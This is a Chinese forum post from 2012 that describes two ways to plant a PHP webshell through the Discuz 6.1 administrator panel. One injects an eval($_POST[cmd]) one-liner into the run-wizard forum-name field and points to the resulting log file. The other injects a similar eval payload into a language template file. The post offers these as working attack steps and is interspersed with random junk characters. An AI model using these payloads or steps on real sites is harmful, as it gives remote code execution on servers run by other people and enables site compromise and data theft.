discuz6.1两种方法后台拿shell
6 F" {. d9 r7 T( k好多朋友说discuz6.1后台不会拿shell,在前段时间这些都是说不公布的东西,我发出来给大家测试一下
: y+ L$ {+ x; M9 n1 C) W, B* ~1:
; ^3 U: c2 Q& Q7 c1 L3 [- Vhttp://127.0.0.1/discuz/admincp. ... zard&frames=yes+ `0 v. X- o! l
admincp.php?action=runwizard&frames=yes点击下一步然后再论坛名称的地方插入webshell
& P2 P! J" l6 m: p. h' U+ V p" a<?php eval($_POST[cmd]);?>" R, H: B: k4 [, y0 ]! {7 F: Z h
后台webshell地址:http://127.0.0.1/discuz/forumdata/logs/runwizardlog.php3 x v, e. R8 ]2 v5 S0 I& A
' R( o$ _: O1 R* k8 x* f; r+ i
l. H( j( s( \' J& R2:后台模板管理--默认模板套系--详情
3 i6 e' _% X' Y/ ]templates/default/actions.lang.php
1 t) {8 g3 G1 ^, M) P6 T- F) Z8 Fjhackj\\');eval($_POST[cmd])?>;//% u# a- P6 t( c+ F
! @" d3 }$ d! a% l) M利用很简单,聪明的人一看就懂了 |
发表于 2012-9-13 16:59:17
收藏
支持
反对